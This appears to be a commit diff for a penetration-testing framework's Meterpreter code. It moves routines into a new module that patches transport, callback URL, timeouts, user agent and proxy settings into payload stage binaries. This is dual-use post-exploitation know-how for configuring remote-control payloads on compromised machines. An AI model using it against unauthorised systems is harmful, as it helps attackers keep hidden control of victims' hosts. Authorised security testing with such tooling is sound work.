Provides methods to patch metsrv stagers with options.

Author: veritysr

lib/rex/payloads.rb

@@ -1,2 +1,3 @@
 # -*- coding: binary -*-
 require 'rex/payloads/win32'
+require 'rex/payloads/meterpreter'

lib/rex/payloads/meterpreter.rb

@@ -0,0 +1,2 @@
+# -*- coding: binary -*-
+require 'rex/payloads/meterpreter/patch'

lib/rex/payloads/meterpreter/patch.rb

@@ -0,0 +1,103 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Payloads
+    module Meterpreter
+      ###
+      #
+      # Provides methods to patch options into metsrv stagers
+      #
+      ###
+      module Patch
+
+	      # Replace the transport string
+	      def self.patch_transport blob, ssl, url, expiration, comm_timeout
+	        
+          i = blob.index("METERPRETER_TRANSPORT_SSL")
+          if i
+            str = ssl ? "METERPRETER_TRANSPORT_HTTPS\x00" : "METERPRETER_TRANSPORT_HTTP\x00"
+            blob[i, str.length] = str
+          end
+          
+          i = blob.index("https://" + ("X" * 256))
+          if i
+            str = url
+            blob[i, str.length] = str
+          end
+
+          i = blob.index([0xb64be661].pack("V"))
+          if i
+            str = [ expiration ].pack("V")
+            blob[i, str.length] = str
+          end
+
+          i = blob.index([0xaf79257f].pack("V"))
+          if i
+            str = [ comm_timeout ].pack("V")
+            blob[i, str.length] = str
+          end
+
+        return blob
+	      end
+
+        # Replace the user agent string with our option
+        def self.patch_ua blob, ua
+
+          i = blob.index("METERPRETER_UA\x00")
+          if i
+            blob[i, ua.length] = ua
+          end
+
+          return blob, i
+        end
+
+        # Activate a custom proxy
+        def self.patch_proxy blob, proxyhost, proxyport, proxy_type
+
+          i = blob.index("METERPRETER_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+          if i
+            if proxyhost
+              if proxyhost.to_s != ""
+                proxyhost = proxyhost.to_s
+                proxyport = proxyport.to_s || "8080"
+                proxyinfo = proxyhost + ":" + proxyport
+                if proxyport == "80"
+                  proxyinfo = proxyhost
+                end
+                if proxy_type.to_s == 'HTTP'
+                  proxyinfo = 'http://' + proxyinfo
+                else #socks
+                  proxyinfo = 'socks=' + proxyinfo
+                end
+                proxyinfo << "\x00"
+                blob[i, proxyinfo.length] = proxyinfo
+              end
+            end
+          end
+
+        return blob, i, proxyinfo
+        end
+
+        # Proxy authentification
+        def self.patch_proxy_auth blob, proxy_username, proxy_password, proxy_type
+
+          unless (proxy_username.nil? or proxy_username.empty?) or
+            (proxy_password.nil? or proxy_password.empty?) or
+            proxy_type == 'SOCKS'
+
+            proxy_username_loc = blob.index("METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+            proxy_username = proxy_username << "\x00"
+            blob[proxy_username_loc, proxy_username.length] = proxy_username
+
+            proxy_password_loc = blob.index("METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+            proxy_password = proxy_password << "\x00"
+            blob[proxy_password_loc, proxy_password.length] = proxy_password
+          end
+
+          return blob
+        end
+
+      end
+    end
+  end
+end

lib/rex/post/meterpreter/client_core.rb

@@ -8,6 +8,9 @@
 # argument for moving the meterpreter client into the Msf namespace.
 require 'msf/core/payload/windows'
 
+# Provides methods to patch options into the metsrv stage.
+require 'rex/payloads/meterpreter/patch'
+
 module Rex
 module Post
 module Meterpreter
@@ -228,31 +231,38 @@ def migrate( pid )
 
     if client.passive_service
 
-      # Replace the transport string first (TRANSPORT_SOCKET_SSL
-      i = blob.index("METERPRETER_TRANSPORT_SSL")
-      if i
-        str = client.ssl ? "METERPRETER_TRANSPORT_HTTPS\x00" : "METERPRETER_TRANSPORT_HTTP\x00"
-        blob[i, str.length] = str
-      end
+      # Replace the transport string first (TRANSPORT_SOCKET_SSL)
+      blob = Rex::Payloads::Meterpreter::Patch.patch_transport(
+        blob,
+        client.ssl,
+        self.client.url,
+        self.client.expiration,
+        self.client.comm_timeout
+      )
+
+      # Replace the user agent string with our option
+      blob, i = Rex::Payloads::Meterpreter::Patch.patch_ua(
+        blob,
+        client.exploit_datastore['MeterpreterUserAgent'][0,255] + "\x00"
+      )
+
+      # Activate a custom proxy
+      blob, i = Rex::Payloads::Meterpreter::Patch.patch_proxy(
+        blob,
+        client.exploit_datastore['PROXYHOST'],
+        client.exploit_datastore['PROXYPORT'],
+        client.exploit_datastore['PROXY_TYPE']
+      )
+      # Proxy authentication
+      blob = Rex::Payloads::Meterpreter::Patch.patch_proxy_auth(
+        blob,
+        client.exploit_datastore['PROXY_USERNAME'],
+        client.exploit_datastore['PROXY_PASSWORD'],
+        client.exploit_datastore['PROXY_TYPE']
+      )
 
       conn_id = self.client.conn_id
-      i = blob.index("https://" + ("X" * 256))
-      if i
-        str = self.client.url
-        blob[i, str.length] = str
-      end
 
-      i = blob.index([0xb64be661].pack("V"))
-      if i
-        str = [ self.client.expiration ].pack("V")
-        blob[i, str.length] = str
-      end
-
-      i = blob.index([0xaf79257f].pack("V"))
-      if i
-        str = [ self.client.comm_timeout ].pack("V")
-        blob[i, str.length] = str
-      end
     end
 
     # Build the migration request